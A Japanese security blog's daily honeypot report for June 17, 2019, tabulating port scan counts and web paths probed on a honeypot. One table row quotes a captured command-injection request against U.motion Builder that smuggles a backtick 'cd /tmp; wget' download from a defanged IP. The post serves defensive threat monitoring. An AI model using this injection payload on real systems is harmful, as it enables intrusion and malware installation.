https://sec-chick.hatenablog.com/entry/2019/06/18/071329

Honeypot簡易分析(305日目:6/17)となります。

◾️Honeypot

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190618003221p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	4077	93
23	telnet	993	-657
5900	vnc	404	-4741
3389	rdp	373	55
3306	mysql	114	-129
9600	micromuse-ncpw	6	65
873	rsync	64	60
443	https	61	3
2323	telnet	47	-69
3307	opsession-prxy	46	-2

9600ポートへのアクセスが増加していますが、特に特定の脆弱性ではなく、スキャン的な通信を検知していました。

＜新規マルウェアダウンロード＞

なし

◾️WoWHoneeypot

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190618004717p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/wp-login.php	WordPress	-	-	273
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	26
/	-	-	-	22
///	-	-	-	2
///wp-json/wp/v2/users/	WordPress	-	-	2
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	2
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞

パス	ペイロード	count
//MyAdmin/scripts/setup.php	GET //MyAdmin/scripts/setup.php	1
//myadmin/scripts/setup.php	GET //myadmin/scripts/setup.php HTTP/1.1	1
//phpMyAdmin/scripts/setup.php	GET //phpMyAdmin/scripts/setup.php HTTP/1.1
	GET //phpmyadmin/scripts/setup.php HTTP/1.1	1
//pma/scripts/setup.php	GET //pma/scripts/setup.php HTTP/1.1	1
/CFIDE/administrator/	GET /CFIDE/administrator/ HTTP/1.1
	GET /muieblackcat HTTP/1.1	1
/smartdomuspad/modules/reporting/track_import_export.php	POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 op=export&language=english&interval=1&object_id=`cd /tmp; wget hxxp://31[.]13.[.]95[.]251/EC	1

1件、マルウェアのダウンロードを試みる通信を検知していました。

こちらの通信はライフスペース管理システムであるU.motion Builder の脆弱性を狙ったものでした。
コマンドの内容はwgetでマルウェアをダウンロードするものとなります。＜マルウェアダウンロード＞
hxxp://31[.]13[.]195[.]251/EC マルウェア自体のダウンロードができずに種類は特定できませんでしたが、同IPで他のマルウェアのダウンロードも確認されているようです。

以上、簡易分析となります。